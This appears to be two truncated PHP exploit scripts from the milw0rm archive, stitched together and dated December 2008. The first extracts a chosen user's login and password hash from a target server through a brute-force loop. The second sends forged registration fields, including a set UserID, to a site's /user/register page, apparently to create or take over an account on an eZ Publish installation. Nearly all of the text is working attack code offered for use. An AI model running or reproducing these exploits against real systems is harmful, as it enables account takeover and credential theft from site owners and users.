} else { $ARG = array(); foreach ($argv as $arg) { if (strpos($arg, '-') === 0) { $key = substr($arg, 1, 1); if (!isset($ARG[$key])) { $ARG[$key] = substr($arg, 3, strlen($arg)); } } } if ($ARG[s] && $ARG[u]) { $server = $ARG[s]; $User_id = intval($ARG[u]); $User_id--; print "[+] Phase 1 brute login.\n"; $login = brute($User_id, "Login"); print "\n[+] Phase 1 successfully finished: {$login}\n"; print "[+] Phase 2 brute password-hash.\n"; $hash = brute($User_id, "Password"); print "\n[+] Phase 2 successfully finished: {$hash}\n"; successfully($login, $hash); } else { help_argc($argv[0]); exit(0); } } ?> # milw0rm.com [2008-12-23]
$key = substr($arg, 1, 1); if (!isset($ARG[$key])) { $ARG[$key] = substr($arg, 3, strlen($arg)); } } } if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s]) { $post_fields = array('ContentObjectAttribute_data_user_login_30' => $ARG[u], 'ContentObjectAttribute_data_user_password_30' => $ARG[p], 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], 'ContentObjectAttribute_data_user_email_30' => $ARG[e], 'UserID' => '14', 'PublishButton' => '1'); $headers = array('User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', 'Referer' => $ARG[s]); $res_http = new HttpRequest($ARG[s] . "/user/register", HttpRequest::METH_POST); $res_http->addPostFields($post_fields); $res_http->addHeaders($headers); try { $response = $res_http->send()->getBody(); if (eregi("success", $response)) { successfully($ARG[u], $ARG[p]); } else { print "[-] Exploit failed"; } } catch (HttpException $exception) { print "[-] Not connected"; exit(0); } } else { help_argc($argv[0]); exit(0); } } ?> # milw0rm.com [2008-12-10]